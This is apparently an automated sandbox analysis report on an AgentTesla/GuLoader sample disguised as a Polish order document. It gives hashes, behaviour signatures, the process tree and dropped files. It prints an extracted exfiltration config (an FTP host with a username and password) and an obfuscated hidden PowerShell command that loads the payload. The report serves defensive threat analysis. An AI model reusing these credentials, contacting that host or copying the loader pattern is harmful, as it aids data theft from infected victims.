Overview

overview

10

Static

static

1

Zamówieni...66.exe

windows7-x64

10

Zamówieni...66.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    143s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231127-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-12-2023 07:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Zamówienie.ZD33166.exe

  • Size

    698KB

  • MD5

    16d009c42496db59b33e6723f913d0c9

  • SHA1

    bed0f6cf09e6bc16190e694d493f891732816e8d

  • SHA256

    d6d400c0847a1893dea669a1c8cfee475cafd9439bc50c694eaccbc04211a0e7

  • SHA512

    02853827c4d99c441c1daf2d22d0da23f42115e7da66396dc9794017322502aee37d2573acc9bf0c3ec300db6697b49ffd3568d1a8544c39973c613daa7f64e3

  • SSDEEP

    12288:UwFGHEN1Sn2VNDyu0AP/0wGc/fMz3rzNI3ylgimtdYM3O0V7bby:U5HEN16kh01w3sZlgZtub0V7q

Score
10/10
agentteslaguloaderdownloaderkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.omamontaggi.it
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    pass@A12345@

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Zamówienie.ZD33166.exe
    "C:\Users\Admin\AppData\Local\Temp\Zamówienie.ZD33166.exe"
    1⤵
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:4776
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Tiljublingens=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Balletdanserindernes\Exudatory\Falskspillerens.Ill';$Konferenserne=$Tiljublingens.SubString(48125,3);.$Konferenserne($Tiljublingens)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3924
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1800

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Rkkens.ini
    Filesize

    32B

    MD5

    a8ca1db6ae34f5e5c152094f44f92476

    SHA1

    9fe0fd4e6907c4f9099d2533c3bade4ffa0968e7

    SHA256

    1f0dbc97d6570f2f5a1e18f82842c9a0007e568ca8fb768c123637ef5077aad3

    SHA512

    e48e987e1f8297b17f7fb5b8b34da6131156834310987600b20b0dcff4c43632ccb4b2305030a4a999f783176d480c8300e6aef92afbb2032379eca6dac88b5a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1qgcwqct.kqi.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Balletdanserindernes\Exudatory\Falskspillerens.Ill
    Filesize

    47KB

    MD5

    fa2b04b706a4a1a50a3866e1fffb34f7

    SHA1

    0bf99926ab1aff752fd2325d7dadcf68440cda83

    SHA256

    d16797d1615df0383dab78a1e90f594439ae34c0f0cc9083e5883f42585718c5

    SHA512

    58097ca7d6c8145504b41807f2e0aa4b41aa4d5e58943d47455c7e60a5bc4288756503d5a93e3c2c362c5c5aa0c782af3cf30a6a10e206d498eed7e7ae993263

    Download Submit

  • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Balletdanserindernes\Exudatory\Wreathless.You
    Filesize

    301KB

    MD5

    a7d050056af386ff8097a7effd1d9f6f

    SHA1

    008fafc028955c2bdab6508168135e42b1c2d437

    SHA256

    5270d655c8baee63673cce7a5d4c4bd8130d37dcc5a0688d5589913b96cc6d95

    SHA512

    7413802fcf4e35e690adef8718dfad2fc73848a3f5e9ea7bc9636795dce7cba8bf28022d28e9323041e2210a2ab413f48d1a990f2bb7b40bf42602b28788870d

    Download Submit

  • memory/1800-223-0x0000000021100000-0x0000000021192000-memory.dmp

    Filesize

    584KB

    Download

  • memory/1800-227-0x00000000732B0000-0x0000000073A60000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1800-221-0x0000000000900000-0x00000000023C2000-memory.dmp

    Filesize

    26.8MB

    Download

  • memory/1800-220-0x000000001E450000-0x000000001E460000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1800-224-0x0000000020AC0000-0x0000000020ACA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/1800-217-0x000000006E0B0000-0x000000006E0F0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1800-218-0x00000000732B0000-0x0000000073A60000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1800-222-0x0000000020A60000-0x0000000020AB0000-memory.dmp

    Filesize

    320KB

    Download

  • memory/1800-214-0x0000000000900000-0x00000000023C2000-memory.dmp

    Filesize

    26.8MB

    Download

  • memory/1800-213-0x000000006E0B0000-0x000000006F304000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/1800-209-0x0000000076F11000-0x0000000077031000-memory.dmp

    Filesize

    1.1MB

    Download

  • memory/1800-208-0x0000000076F98000-0x0000000076F99000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1800-206-0x0000000000900000-0x00000000023C2000-memory.dmp

    Filesize

    26.8MB

    Download

  • memory/1800-228-0x000000001E450000-0x000000001E460000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3924-186-0x0000000006440000-0x000000000645E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/3924-191-0x0000000007420000-0x0000000007442000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3924-192-0x0000000007A00000-0x0000000007FA4000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/3924-197-0x00000000079A0000-0x00000000079A4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/3924-198-0x00000000732B0000-0x0000000073A60000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3924-199-0x0000000008CB0000-0x000000000A772000-memory.dmp

    Filesize

    26.8MB

    Download

  • memory/3924-200-0x0000000008CB0000-0x000000000A772000-memory.dmp

    Filesize

    26.8MB

    Download

  • memory/3924-202-0x0000000002E40000-0x0000000002E50000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3924-203-0x0000000002E40000-0x0000000002E50000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3924-204-0x0000000002E40000-0x0000000002E50000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3924-205-0x0000000076F11000-0x0000000077031000-memory.dmp

    Filesize

    1.1MB

    Download

  • memory/3924-190-0x0000000006950000-0x000000000696A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/3924-207-0x0000000008CB0000-0x000000000A772000-memory.dmp

    Filesize

    26.8MB

    Download

  • memory/3924-194-0x0000000008630000-0x0000000008CAA000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/3924-189-0x00000000069A0000-0x0000000006A36000-memory.dmp

    Filesize

    600KB

    Download

  • memory/3924-188-0x0000000002E40000-0x0000000002E50000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3924-187-0x0000000006470000-0x00000000064BC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/3924-216-0x00000000732B0000-0x0000000073A60000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3924-185-0x0000000005DA0000-0x00000000060F4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/3924-175-0x0000000005D30000-0x0000000005D96000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3924-219-0x0000000008CB0000-0x000000000A772000-memory.dmp

    Filesize

    26.8MB

    Download

  • memory/3924-174-0x0000000005CC0000-0x0000000005D26000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3924-173-0x00000000053C0000-0x00000000053E2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3924-172-0x0000000005690000-0x0000000005CB8000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/3924-171-0x0000000002E40000-0x0000000002E50000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3924-170-0x0000000002E40000-0x0000000002E50000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3924-169-0x00000000732B0000-0x0000000073A60000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3924-168-0x0000000002D90000-0x0000000002DC6000-memory.dmp

    Filesize

    216KB

    Download